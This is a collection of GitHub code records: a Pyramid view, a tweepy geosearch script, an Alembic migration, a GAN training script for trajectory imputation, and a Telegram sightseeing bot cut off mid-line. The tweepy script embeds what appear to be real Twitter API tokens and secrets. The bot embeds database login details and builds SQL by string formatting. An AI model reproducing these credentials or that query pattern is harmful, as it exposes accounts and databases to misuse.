"PIL.ImageTk.PhotoImage", "line_number": 470, "usage_type": "call"}, {"api_name": "PIL.ImageTk", "line_number": 470, "usage_type": "name"}, {"api_name": "PIL.Image.open", "line_number": 470, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 470, "usage_type": "name"}, {"api_name": "tkinter.ttk.Button", "line_number": 471, "usage_type": "call"}, {"api_name": "tkinter.ttk", "line_number": 471, "usage_type": "name"}, {"api_name": "tkinter.ttk.Frame", "line_number": 485, "usage_type": "attribute"}, {"api_name": "tkinter.ttk", "line_number": 485, "usage_type": "name"}, {"api_name": "PIL.ImageTk.PhotoImage", "line_number": 505, "usage_type": "call"}, {"api_name": "PIL.ImageTk", "line_number": 505, "usage_type": "name"}, {"api_name": "PIL.Image.open", "line_number": 505, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 505, "usage_type": "name"}, {"api_name": "tkinter.ttk.Label", "line_number": 506, "usage_type": "call"}, {"api_name": "tkinter.ttk", "line_number": 506, "usage_type": "name"}, {"api_name": "tkinter.ttk.Notebook", "line_number": 522, "usage_type": "attribute"}, {"api_name": "tkinter.ttk", "line_number": 522, "usage_type": "name"}, {"api_name": "tkinter.Menu", "line_number": 534, "usage_type": "attribute"}, {"api_name": "tkinter.Menu", "line_number": 542, "usage_type": "call"}, {"api_name": "tkinter.Menu", "line_number": 547, "usage_type": "call"}, {"api_name": "ttkthemes.themed_tk.ThemedTk", "line_number": 557, "usage_type": "attribute"}, {"api_name": "ttkthemes.themed_tk", "line_number": 557, "usage_type": "name"}, {"api_name": "ctypes.windll.shcore.SetProcessDpiAwareness", "line_number": 563, "usage_type": "call"}, {"api_name": "ctypes.windll", "line_number": 563, "usage_type": "attribute"}]}
+{"seq_id": "42999142867", "text": "from pyramid.response import Response\nfrom pyramid.view import view_config, view_defaults\n\nfrom sqlalchemy.exc import DBAPIError\n\nfrom pyramid.httpexceptions import HTTPFound\nfrom pyramid.security import Everyone, Authenticated\n\nfrom .models import (\n DBSession,\n get_operator,\n asdict,\n alog,\n get_logs,\n active_nets,\n get_active_nets,\n all_nets,\n get_net,\n chart_operator_activity,\n chart_net_participation,\n )\n\nimport logging\nlog = logging.getLogger(__name__)\n\n@view_defaults()\nclass ReportViews(object):\n def __init__(self, request):\n self.request = request\n\n @view_config(route_name=\"reports\", renderer=\"reports/index.html\")\n def reports(request):\n return dict()\n\n @view_config(route_name=\"chart_operator_activity\", renderer=\"json\")\n def chart_operator_activity(self):\n return chart_operator_activity()\n\n @view_config(route_name=\"chart_net_participation\", renderer=\"json\")\n def chart_operator_activity(self):\n return chart_net_participation()\n", "repo_name": "stephanellis/netmanager", "sub_path": "netmanager/view_reports.py", "file_name": "view_reports.py", "file_ext": "py", "file_size_in_byte": 1033, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 8, "dataset": "github-code", "pt": "53", "api": [{"api_name": "logging.getLogger", "line_number": 24, "usage_type": "call"}, {"api_name": "pyramid.view.view_config", "line_number": 31, "usage_type": "call"}, {"api_name": "models.chart_operator_activity", "line_number": 37, "usage_type": "call"}, {"api_name": "pyramid.view.view_config", "line_number": 35, "usage_type": "call"}, {"api_name": "models.chart_net_participation", "line_number": 41, "usage_type": "call"}, {"api_name": "pyramid.view.view_config", "line_number": 39, "usage_type": "call"}, {"api_name": "pyramid.view.view_defaults", "line_number": 26, "usage_type": "call"}]}
+{"seq_id": "35364226200", "text": "#import location as location\nimport tweepy\nimport json\n\nACCESS_TOKEN = '4843507186-Kc982XGeypByuevVKdAhbMmEwnOmWWxgw247hUV'\nACCESS_SECRET = 'bKFAS5HDMzRMuckOnbMIjwjDxnKzUeivIz5VbENrs4soR'\nCONSUMER_KEY = '5rkFkJDFPVBVDSvtNtoVpFpgq'\nCONSUMER_SECRET = 'VkK5YIETgPFNgKwt1tFHRSrztnNW00cbVaxCUAgMYqGrI5VHxa'\n\nauth = tweepy.OAuthHandler(CONSUMER_KEY, CONSUMER_SECRET)\nauth.set_access_token(ACCESS_TOKEN, ACCESS_SECRET)\n\nlatitude = 36.778261\t# geographical centre of search\nlongitude = -119.417932\t# geographical centre of search\nmax_range = 1 \t\t\t# search range in kilometres\napi = tweepy.API(auth)\napi.wait_on_rate_limit = True\napi.wait_on_rate_limit_notify = True\n\nfor tweet in tweepy.Cursor(api.search, q='',geocode = \"%f,%f,%dkm\" % (latitude, longitude, max_range) ,lang= 'en').items():\n print (tweet.created_at, tweet.text, tweet.user.id , tweet.user.followers_count,tweet.user.location)\n\n # with open('data.txt', 'w') as outfile:\n # json.dump(tweet.created_at, tweet.text, tweet.user.id , tweet.user.followers_count,tweet.user.location.txt, outfile)", "repo_name": "SidrahJunaid/thesis1", "sub_path": "thesis_tweet_2/tweet_collection_2.py", "file_name": "tweet_collection_2.py", "file_ext": "py", "file_size_in_byte": 1084, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "tweepy.OAuthHandler", "line_number": 10, "usage_type": "call"}, {"api_name": "tweepy.API", "line_number": 16, "usage_type": "call"}, {"api_name": "tweepy.Cursor", "line_number": 20, "usage_type": "call"}]}
+{"seq_id": "72134579367", "text": "\"\"\"empty message\n\nRevision ID: 041172383de8\nRevises: a4a1a1ebb875\nCreate Date: 2022-01-27 22:33:10.207723\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = '041172383de8'\ndown_revision = 'a4a1a1ebb875'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.add_column('funcionario', sa.Column('senha_hash', sa.String(length=70), nullable=False))\n op.drop_column('funcionario', 'senha')\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.add_column('funcionario', sa.Column('senha', sa.VARCHAR(length=70), nullable=False))\n op.drop_column('funcionario', 'senha_hash')\n # ### end Alembic commands ###\n", "repo_name": "GiuBontempo/Hamburgueria", "sub_path": "migrations/versions/041172383de8_.py", "file_name": "041172383de8_.py", "file_ext": "py", "file_size_in_byte": 814, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "alembic.op.add_column", "line_number": 21, "usage_type": "call"}, {"api_name": "alembic.op", "line_number": 21, "usage_type": "name"}, {"api_name": "sqlalchemy.Column", "line_number": 21, "usage_type": "call"}, {"api_name": "sqlalchemy.String", "line_number": 21, "usage_type": "call"}, {"api_name": "alembic.op.drop_column", "line_number": 22, "usage_type": "call"}, {"api_name": "alembic.op", "line_number": 22, "usage_type": "name"}, {"api_name": "alembic.op.add_column", "line_number": 28, "usage_type": "call"}, {"api_name": "alembic.op", "line_number": 28, "usage_type": "name"}, {"api_name": "sqlalchemy.Column", "line_number": 28, "usage_type": "call"}, {"api_name": "sqlalchemy.VARCHAR", "line_number": 28, "usage_type": "call"}, {"api_name": "alembic.op.drop_column", "line_number": 29, "usage_type": "call"}, {"api_name": "alembic.op", "line_number": 29, "usage_type": "name"}]}
+{"seq_id": "26672225524", "text": "import argparse\nimport os\nimport math\nimport sys\nimport pickle\nimport time\nimport numpy as np\nimport shutil\nsys.path.append(os.path.abspath(os.path.join(os.path.dirname(__file__), '..')))\n\nfrom model import *\nfrom torch.autograd import Variable\nfrom torch import nn\nimport torch\nimport torch.utils\nimport torch.utils.data\n\nfrom helpers import *\nimport visdom\n\nTensor = torch.DoubleTensor\ntorch.set_default_tensor_type('torch.DoubleTensor')\n\ndef printlog(line):\n print(line)\n with open(save_path+'log.txt', 'a') as file:\n file.write(line+'\\n')\n\nparser = argparse.ArgumentParser()\nparser.add_argument('-t', '--trial', type=int, required=True)\nparser.add_argument('--model', type=str, required=True, help='NAOMI, SingleRes')\nparser.add_argument('--task', type=str, required=True, help='basketball, billiard')\nparser.add_argument('--y_dim', type=int, required=True)\nparser.add_argument('--rnn_dim', type=int, required=True)\nparser.add_argument('--dec1_dim', type=int, required=True)\nparser.add_argument('--dec2_dim', type=int, required=True)\nparser.add_argument('--dec4_dim', type=int, required=True)\nparser.add_argument('--dec8_dim', type=int, required=True)\nparser.add_argument('--dec16_dim', type=int, required=True)\nparser.add_argument('--n_layers', type=int, required=False, default=2)\nparser.add_argument('--seed', type=int, required=False, default=123)\nparser.add_argument('--clip', type=int, required=True, help='gradient clipping')\nparser.add_argument('--pre_start_lr', type=float, required=True, help='pretrain starting learning rate')\nparser.add_argument('--batch_size', type=int, required=False, default=64)\nparser.add_argument('--save_every', type=int, required=False, default=50, help='periodically save model')\nparser.add_argument('--pretrain', type=int, required=False, default=50, help='num epochs to use supervised learning to pretrain')\nparser.add_argument('--highest', type=int, required=False, default=1, help='highest resolution in terms of step size in NAOMI')\nparser.add_argument('--cuda', action='store_true', default=True, help='use GPU')\n\nparser.add_argument('--discrim_rnn_dim', type=int, required=True)\nparser.add_argument('--discrim_layers', type=int, required=True, default=2)\nparser.add_argument('--policy_learning_rate', type=float, default=1e-6, help='policy network learning rate for GAN training')\nparser.add_argument('--discrim_learning_rate', type=float, default=1e-3, help='discriminator learning rate for GAN training')\nparser.add_argument('--max_iter_num', type=int, default=60000, help='maximal number of main iterations (default: 60000)')\nparser.add_argument('--log_interval', type=int, default=1, help='interval between training status logs (default: 1)')\nparser.add_argument('--draw_interval', type=int, default=200, help='interval between drawing and more detailed information (default: 50)')\nparser.add_argument('--pretrain_disc_iter', type=int, default=2000, help=\"pretrain discriminator iteration (default: 2000)\")\nparser.add_argument('--save_model_interval', type=int, default=50, help=\"interval between saving model (default: 50)\")\n\nargs = parser.parse_args()\n\nif not torch.cuda.is_available():\n args.cuda = False\n \n# model parameters\nparams = {\n 'task' : args.task,\n 'batch' : args.batch_size,\n 'y_dim' : args.y_dim,\n 'rnn_dim' : args.rnn_dim,\n 'dec1_dim' : args.dec1_dim,\n 'dec2_dim' : args.dec2_dim,\n 'dec4_dim' : args.dec4_dim,\n 'dec8_dim' : args.dec8_dim,\n 'dec16_dim' : args.dec16_dim,\n 'n_layers' : args.n_layers,\n 'discrim_rnn_dim' : args.discrim_rnn_dim,\n 'discrim_num_layers' : args.discrim_layers,\n 'cuda' : args.cuda,\n 'highest' : args.highest,\n}\n\n# hyperparameters\npretrain_epochs = args.pretrain\nclip = args.clip\nstart_lr = args.pre_start_lr\nbatch_size = args.batch_size\nsave_every = args.save_every\n\n# manual seed\nnp.random.seed(args.seed)\ntorch.manual_seed(args.seed)\nif use_gpu:\n torch.cuda.manual_seed_all(args.seed)\n\n# build model\npolicy_net = eval(args.model)(params)\ndiscrim_net = Discriminator(params).double()\nif args.cuda:\n policy_net, discrim_net = policy_net.cuda(), discrim_net.cuda()\nparams['total_params'] = num_trainable_params(policy_net)\nprint(params)\n\n# create save path and saving parameters\nsave_path = 'saved/' + args.model + '_' + args.task + '_%03d/' % args.trial\nif not os.path.exists(save_path):\n os.makedirs(save_path)\n os.makedirs(save_path+'model/')\n\n# Data\nif args.task == 'basketball':\n test_data = torch.Tensor(pickle.load(open('data/basketball_eval.p', 'rb'))).transpose(0, 1)[:, :-1, :]\n train_data = torch.Tensor(pickle.load(open('data/basketball_train.p', 'rb'))).transpose(0, 1)[:, :-1, :]\nelif args.task == 'billiard':\n test_data = torch.Tensor(pickle.load(open('data/billiard_eval.p', 'rb'), encoding='latin1'))[:, :, :]\n train_data = torch.Tensor(pickle.load(open('data/billiard_train.p', 'rb'), encoding='latin1'))[:, :, :]\nelse:\n print('no such task')\n exit()\nprint(test_data.shape, train_data.shape)\n\n# figures and statistics\nif os.path.exists('imgs'):\n shutil.rmtree('imgs')\nif not os.path.exists('imgs'):\n os.makedirs('imgs')\nvis = visdom.Visdom(env = args.model + args.task + str(args.trial))\nwin_pre_policy = None\nwin_pre_path_length = None\nwin_pre_out_of_bound = None\nwin_pre_step_change = None\n\n############################################################################\n################## START SUPERVISED PRETRAIN ##################\n############################################################################\n\n# pretrain\nbest_test_loss = 0\nlr = start_lr\nteacher_forcing = True\nfor e in range(pretrain_epochs):\n epoch = e+1\n print(\"Epoch: {}\".format(epoch))\n\n # draw and stats \n _, _, _, _, _, _, mod_stats, exp_stats = \\\n collect_samples_interpolate(policy_net, test_data, use_gpu, e, args.task, name='pretrain_inter', draw=True, stats=True)\n \n update = 'append' if epoch > 1 else None\n win_pre_path_length = vis.line(X = np.array([epoch]), \\\n Y = np.column_stack((np.array([exp_stats['ave_length']]), np.array([mod_stats['ave_length']]))), \\\n win = win_pre_path_length, update = update, opts=dict(legend=['expert', 'model'], title=\"average path length\"))\n win_pre_out_of_bound = vis.line(X = np.array([epoch]), \\\n Y = np.column_stack((np.array([exp_stats['ave_out_of_bound']]), np.array([mod_stats['ave_out_of_bound']]))), \\\n win = win_pre_out_of_bound, update = update, opts=dict(legend=['expert', 'model'], title=\"average out of bound rate\"))\n win_pre_step_change = vis.line(X = np.array([epoch]), \\\n Y = np.column_stack((np.array([exp_stats['ave_change_step_size']]), np.array([mod_stats['ave_change_step_size']]))), \\\n win = win_pre_step_change, update = update, opts=dict(legend=['expert', 'model'], title=\"average step size change\"))\n\n # control learning rate\n if epoch == pretrain_epochs // 2:\n lr = lr / 10\n print(lr)\n \n if args.task == 'billiard' and epoch == pretrain_epochs * 2 // 3:\n teacher_forcing = False\n\n # train\n optimizer = torch.optim.Adam(\n filter(lambda p: p.requires_grad, policy_net.parameters()),\n lr=lr)\n\n start_time = time.time()\n\n train_loss = run_epoch(True, policy_net, train_data, clip, optimizer, teacher_forcing=teacher_forcing)\n printlog('Train:\\t' + str(train_loss))\n\n test_loss = run_epoch(False, policy_net, test_data, clip, optimizer, teacher_forcing=teacher_forcing)\n printlog('Test:\\t' + str(test_loss))\n\n epoch_time = time.time() - start_time\n printlog('Time:\\t {:.3f}'.format(epoch_time))\n\n total_test_loss = test_loss\n \n update = 'append' if epoch > 1 else None\n win_pre_policy = vis.line(X = np.array([epoch]), Y = np.column_stack((np.array([test_loss]), np.array([train_loss]))), \\\n win = win_pre_policy, update = update, opts=dict(legend=['out-of-sample loss', 'in-sample loss'], \\\n title=\"pretrain policy training curve\"))\n\n # best model on test set\n if best_test_loss == 0 or total_test_loss < best_test_loss: \n best_test_loss = total_test_loss\n filename = save_path+'model/policy_step'+str(args.highest)+'_state_dict_best_pretrain.pth'\n torch.save(policy_net.state_dict(), filename)\n printlog('Best model at epoch '+str(epoch))\n\n # periodically save model\n if epoch % save_every == 0:\n filename = save_path+'model/policy_step'+str(args.highest)+'_state_dict_'+str(epoch)+'.pth'\n torch.save(policy_net.state_dict(), filename)\n printlog('Saved model')\n \nprintlog('End of Pretrain, Best Test Loss: {:.4f}'.format(best_test_loss))\n\n# billiard does not need adversarial training\nif args.task == 'billiard':\n exit()\n\n############################################################################\n################## START ADVERSARIAL TRAINING ##################\n############################################################################\n\n# load the best pretrained policy\npolicy_state_dict = torch.load(save_path+'model/policy_step'+str(args.highest)+'_state_dict_best_pretrain.pth')\n#policy_state_dict = torch.load(save_path+'model/policy_step'+str(args.highest)+'_training.pth')\npolicy_net.load_state_dict(policy_state_dict)\n \n# optimizer\noptimizer_policy = torch.optim.Adam(\n filter(lambda p: p.requires_grad, policy_net.parameters()),\n lr=args.policy_learning_rate)\noptimizer_discrim = torch.optim.Adam(discrim_net.parameters(), lr=args.discrim_learning_rate)\ndiscrim_criterion = nn.BCELoss()\nif use_gpu:\n discrim_criterion = discrim_criterion.cuda()\n\n# stats\nexp_p = []\nwin_exp_p = None\nmod_p = []\nwin_mod_p = None\nwin_path_length = None\nwin_out_of_bound = None\nwin_step_change = None\n\n# Pretrain Discriminator\nfor i in range(args.pretrain_disc_iter):\n exp_states, exp_actions, exp_seq, model_states_var, model_actions_var, model_seq, mod_stats, exp_stats = \\\n collect_samples_interpolate(policy_net, train_data, use_gpu, i, args.task, name=\"pretraining\", draw=False, stats=False)\n model_states = model_states_var.data\n model_actions = model_actions_var.data\n pre_mod_p, pre_exp_p = update_discrim(discrim_net, optimizer_discrim, discrim_criterion, exp_states, \\\n exp_actions, model_states, model_actions, i, dis_times=3.0, use_gpu=use_gpu, train=True)\n\n print(i, 'exp: ', pre_exp_p, 'mod: ', pre_mod_p)\n\n if pre_mod_p < 0.3:\n break\n\n# Save pretrained model\nif args.pretrain_disc_iter > 250:\n torch.save(policy_net.state_dict(), save_path+'model/policy_step'+str(args.highest)+'_pretrained.pth')\n torch.save(discrim_net.state_dict(), save_path+'model/discrim_step'+str(args.highest)+'_pretrained.pth')\n \n# GAN training\nfor i_iter in range(args.max_iter_num):\n ts0 = time.time()\n print(\"Collecting Data\")\n exp_states, exp_actions, exp_seq, model_states_var, model_actions_var, model_seq, mod_stats, exp_stats = \\\n collect_samples_interpolate(policy_net, train_data, use_gpu, i_iter, args.task, draw=False, stats=False)\n model_states = model_states_var.data\n model_actions = model_actions_var.data \n \n # draw and stats\n if i_iter % args.draw_interval == 0:\n _, _, _, _, _, _, mod_stats, exp_stats = \\\n collect_samples_interpolate(policy_net, test_data, use_gpu, i_iter, args.task, draw=True, stats=True)\n \n # print(mod_stats)\n update = 'append' if i_iter > 0 else None\n win_path_length = vis.line(X = np.array([i_iter // args.draw_interval]), \\\n Y = np.column_stack((np.array([exp_stats['ave_length']]), np.array([mod_stats['ave_length']]))), \\\n win = win_path_length, update = update, opts=dict(legend=['expert', 'model'], title=\"average path length\"))\n win_out_of_bound = vis.line(X = np.array([i_iter // args.draw_interval]), \\\n Y = np.column_stack((np.array([exp_stats['ave_out_of_bound']]), np.array([mod_stats['ave_out_of_bound']]))), \\\n win = win_out_of_bound, update = update, opts=dict(legend=['expert', 'model'], title=\"average out of bound rate\"))\n win_step_change = vis.line(X = np.array([i_iter // args.draw_interval]), \\\n Y = np.column_stack((np.array([exp_stats['ave_change_step_size']]), np.array([mod_stats['ave_change_step_size']]))), \\\n win = win_step_change, update = update, opts=dict(legend=['expert', 'model'], title=\"average step size change\"))\n \n ts1 = time.time()\n\n t0 = time.time()\n # update discriminator\n mod_p_epoch, exp_p_epoch = update_discrim(discrim_net, optimizer_discrim, discrim_criterion, exp_states, exp_actions, \\\n model_states, model_actions, i_iter, dis_times=3.0, use_gpu=use_gpu, train=True)\n exp_p.append(exp_p_epoch)\n mod_p.append(mod_p_epoch)\n \n # update policy network\n if i_iter > 3 and mod_p[-1] < 0.8:\n update_policy(policy_net, optimizer_policy, discrim_net, discrim_criterion, model_states_var, model_actions_var, i_iter, use_gpu)\n t1 = time.time()\n\n if i_iter % args.log_interval == 0:\n print('{}\\tT_sample {:.4f}\\tT_update {:.4f}\\texp_p {:.3f}\\tmod_p {:.3f}'.format(\n i_iter, ts1-ts0, t1-t0, exp_p[-1], mod_p[-1]))\n \n update = 'append'\n if win_exp_p is None:\n update = None\n win_exp_p = vis.line(X = np.array([i_iter]), \\\n Y = np.column_stack((np.array([exp_p[-1]]), np.array([mod_p[-1]]))), \\\n win = win_exp_p, update = update, \\\n opts=dict(legend=['expert_prob', 'model_prob'], title=\"training curve probs\"))\n\n if args.save_model_interval > 0 and (i_iter) % args.save_model_interval == 0:\n torch.save(policy_net.state_dict(), save_path+'model/policy_step'+str(args.highest)+'_training.pth')\n torch.save(discrim_net.state_dict(), save_path+'model/discrim_step'+str(args.highest)+'_training.pth')\n", "repo_name": "felixykliu/NAOMI", "sub_path": "train.py", "file_name": "train.py", "file_ext": "py", "file_size_in_byte": 14011, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 46, "dataset": "github-code", "pt": "53", "api": [{"api_name": "sys.path.append", "line_number": 9, "usage_type": "call"}, {"api_name": "sys.path", "line_number": 9, "usage_type": "attribute"}, {"api_name": "os.path.abspath", "line_number": 9, "usage_type": "call"}, {"api_name": "os.path", "line_number": 9, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 9, "usage_type": "call"}, {"api_name": "os.path.dirname", "line_number": 9, "usage_type": "call"}, {"api_name": "torch.DoubleTensor", "line_number": 21, "usage_type": "attribute"}, {"api_name": "torch.set_default_tensor_type", "line_number": 22, "usage_type": "call"}, {"api_name": "argparse.ArgumentParser", "line_number": 29, "usage_type": "call"}, {"api_name": "torch.cuda.is_available", "line_number": 62, "usage_type": "call"}, {"api_name": "torch.cuda", "line_number": 62, "usage_type": "attribute"}, {"api_name": "numpy.random.seed", "line_number": 91, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 91, "usage_type": "attribute"}, {"api_name": "torch.manual_seed", "line_number": 92, "usage_type": "call"}, {"api_name": "torch.cuda.manual_seed_all", "line_number": 94, "usage_type": "call"}, {"api_name": "torch.cuda", "line_number": 94, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 106, "usage_type": "call"}, {"api_name": "os.path", "line_number": 106, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 107, "usage_type": "call"}, {"api_name": "os.makedirs", "line_number": 108, "usage_type": "call"}, {"api_name": "torch.Tensor", "line_number": 112, "usage_type": "call"}, {"api_name": "pickle.load", "line_number": 112, "usage_type": "call"}, {"api_name": "torch.Tensor", "line_number": 113, "usage_type": "call"}, {"api_name": "pickle.load", "line_number": 113, "usage_type": "call"}, {"api_name": "torch.Tensor", "line_number": 115, "usage_type": "call"}, {"api_name": "pickle.load", "line_number": 115, "usage_type": "call"}, {"api_name": "torch.Tensor", "line_number": 116, "usage_type": "call"}, {"api_name": "pickle.load", "line_number": 116, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 123, "usage_type": "call"}, {"api_name": "os.path", "line_number": 123, "usage_type": "attribute"}, {"api_name": "shutil.rmtree", "line_number": 124, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 125, "usage_type": "call"}, {"api_name": "os.path", "line_number": 125, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 126, "usage_type": "call"}, {"api_name": "visdom.Visdom", "line_number": 127, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 150, "usage_type": "call"}, {"api_name": "numpy.column_stack", "line_number": 151, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 151, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 153, "usage_type": "call"}, {"api_name": "numpy.column_stack", "line_number": 154, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 154, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 156, "usage_type": "call"}, {"api_name": "numpy.column_stack", "line_number": 157, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 157, "usage_type": "call"}, {"api_name": "torch.optim.Adam", "line_number": 169, "usage_type": "call"}, {"api_name": "torch.optim", "line_number": 169, "usage_type": "attribute"}, {"api_name": "time.time", "line_number": 173, "usage_type": "call"}, {"api_name": "time.time", "line_number": 181, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 187, "usage_type": "call"}, {"api_name": "numpy.column_stack", "line_number": 187, "usage_type": "call"}, {"api_name": "torch.save", "line_number": 195, "usage_type": "call"}, {"api_name": "torch.save", "line_number": 201, "usage_type": "call"}, {"api_name": "torch.load", "line_number": 215, "usage_type": "call"}, {"api_name": "torch.optim.Adam", "line_number": 220, "usage_type": "call"}, {"api_name": "torch.optim", "line_number": 220, "usage_type": "attribute"}, {"api_name": "torch.optim.Adam", "line_number": 223, "usage_type": "call"}, {"api_name": "torch.optim", "line_number": 223, "usage_type": "attribute"}, {"api_name": "torch.nn.BCELoss", "line_number": 224, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 224, "usage_type": "name"}, {"api_name": "torch.save", "line_number": 253, "usage_type": "call"}, {"api_name": "torch.save", "line_number": 254, "usage_type": "call"}, {"api_name": "time.time", "line_number": 258, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 272, "usage_type": "call"}, {"api_name": "numpy.column_stack", "line_number": 273, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 273, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 275, "usage_type": "call"}, {"api_name": "numpy.column_stack", "line_number": 276, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 276, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 278, "usage_type": "call"}, {"api_name": "numpy.column_stack", "line_number": 279, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 279, "usage_type": "call"}, {"api_name": "time.time", "line_number": 282, "usage_type": "call"}, {"api_name": "time.time", "line_number": 284, "usage_type": "call"}, {"api_name": "time.time", "line_number": 294, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 303, "usage_type": "call"}, {"api_name": "numpy.column_stack", "line_number": 304, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 304, "usage_type": "call"}, {"api_name": "torch.save", "line_number": 309, "usage_type": "call"}, {"api_name": "torch.save", "line_number": 310, "usage_type": "call"}]}
+{"seq_id": "13205084887", "text": "import logging\nfrom telegram.ext import Updater, CommandHandler, CallbackQueryHandler, MessageHandler, Filters\nfrom telegram import InlineKeyboardButton, InlineKeyboardMarkup, CallbackQuery, ReplyKeyboardMarkup, KeyboardButton\nimport telegram\nimport psycopg2\n \n\nlogging.basicConfig(format='%(asctime)s - %(name)s - %(levelname)s - %(message)s',\n level=logging.INFO)\nlogger = logging.getLogger(__name__)\n\nUsers_Data = {}\nUsers_Begins = {}\nUsers_Ends = {}\nMarshrs = {}\n\nCities = ['Екатеринбург', 'Нижний Новгород', 'Краснодар', 'Красноярск',\n 'Новосибирск', 'Санкт-Петербург', 'Самара', 'Сочи', 'Уфа']\n\nclass Bott:\n \n def __init__(self,token):\n self.updater = Updater(token = token)\n self.i = 0\n self.begin = 0\n self.end = 10\n self.updater.dispatcher.add_handler(CommandHandler('start', self.start))\n self.updater.dispatcher.add_handler(CallbackQueryHandler(self.btn_handler))\n self.updater.dispatcher.add_handler(CommandHandler('help', self.help))\n self.updater.dispatcher.add_handler(MessageHandler(Filters.all, self.msg_handler))\n self.updater.dispatcher.add_error_handler(self.error)\n \n\n def start_handler(self):\n self.updater.start_polling()\n self.updater.idle()\n \n def start(self, bot ,update):\n self.bot = bot\n self.update = update\n self.marshr = 0\n self.begin = 0\n self.end = 10\n self.update.message.reply_text(\"Hello!\")\n\n self.keyboard = []\n for city in Cities:\n self.keyboard.append([InlineKeyboardButton(city, callback_data=city)])\n \n self.keyboard.append([InlineKeyboardButton(\"Не хочу\", callback_data='Нет')])\n \n self.reply_markup = InlineKeyboardMarkup(self.keyboard)\n update.message.reply_text( 'Здравствуйте! Выберите город, чтоб ознакомиться с достопримечательностями'\n , reply_markup = self.reply_markup)\n \n\n def help(self,bot,update):\n self.update = update\n self.bot = bot\n print(type(update.message))\n self.update.message.reply_text(\"Use /start to test this bot.\")\n\n def error(self, bot, update, error):\n logger.warning('Update \"%s\" caused error \"%s\"', update, error)\n \n def db_connection(self, city):\n try:\n conn = psycopg2.connect(\"dbname='fn1181_2018' user='student' host='195.19.32.74' password='bmstu' port='5432'\")\n except:\n print(\"I am unable to connect to the database\")\n cursor = conn.cursor()\n cursor.execute(\"SELECT * FROM sight WHERE city = '{}'\".format(city))\n return cursor \n \n \n def updateKeyboard(self, begin, end):\n self.keyboard = []\n if(self.begin < self.end):\n for i in range(self.begin, self.end):\n self.keyboard.append([InlineKeyboardButton(self.data[i][1], callback_data = str(i))])\n self.keyboard.append([InlineKeyboardButton(\"Далее\", callback_data = 'more')])\n if self.begin > 0:\n self.keyboard.append([InlineKeyboardButton(\"Назад\", callback_data = 'назад')])\n else:\n self.keyboard.append([InlineKeyboardButton(\"Заново\", callback_data = 'Заново')])\n self.keyboard.append([InlineKeyboardButton(\"Нет\", callback_data = 'Нет')])\n\n \n def btn_handler(self,bot,update): \n query = update.callback_query\n id = query.message.chat_id\n m_id = query.message.message_id\n if query.data == \"Нет\":\n bot.edit_message_text(text=\"До свидания! Хорошего настроения!\",\n chat_id = id,\n message_id = m_id)\n elif query.data in Cities:\n bot.delete_message(chat_id = id, message_id = m_id)\n self.cursor = self.db_connection(query.data)\n \n Users_Data[id] = self.cursor.fetchall()\n Users_Begins[id] = 0\n Users_Ends[id] = 10\n print(\"\\nNew user \" + str(id) + \" pressed: \" + query.data)\n \n self.data = Users_Data.get(id)\n self.begin = Users_Begins.get(id)\n self.end = Users_Ends.get(id)\n \n self.updateKeyboard(self.begin,self.end)\n reply_markup = InlineKeyboardMarkup(self.keyboard) \n bot.send_message(chat_id = id, message_id = m_id, text ='Что Вам наиболее интересно?',\n reply_markup = reply_markup, parse_mode = 'Markdown')\n elif query.data == 'more':\n self.data = Users_Data.get(id)\n self.begin = Users_Begins.get(id)\n self.end = Users_Ends.get(id)\n \n self.begin += 10\n self.end += 10\n if self.end > len(self.data):\n self.end = len(self.data)\n\n Users_Begins[id] = self.begin\n Users_Ends[id] = self.end\n \n bot.delete_message(chat_id = id, message_id = m_id)\n self.updateKeyboard(self.begin,self.end)\n reply_markup = InlineKeyboardMarkup(self.keyboard)\n if(self.begin < self.end):\n bot.send_message(chat_id = id, message_id = m_id, text ='Что Вам наиболее интересно?',\n reply_markup = reply_markup , parse_mode = 'Markdown')\n else:\n bot.send_message(chat_id = id, message_id = m_id, text ='Достопримечательности закончились. Показать заново?',\n reply_markup = reply_markup, parse_mode = 'Markdown')\n elif query.data == 'назад':\n self.data = Users_Data.get(id)\n self.begin = Users_Begins.get(id)\n self.end = Users_Ends.get(id)\n \n if self.end == len(self.data):\n self.end -= len(self.data) % 10\n self.begin -= 10\n else:\n self.begin -= 10\n self.end -= 10\n\n Users_Begins[id] = self.begin\n Users_Ends[id] = self.end\n \n bot.delete_message(chat_id = id, message_id = m_id)\n self.updateKeyboard(self.begin,self.end)\n reply_markup = InlineKeyboardMarkup(self.keyboard)\n if(self.begin < self.end):\n bot.send_message(chat_id = id, message_id = m_id, text 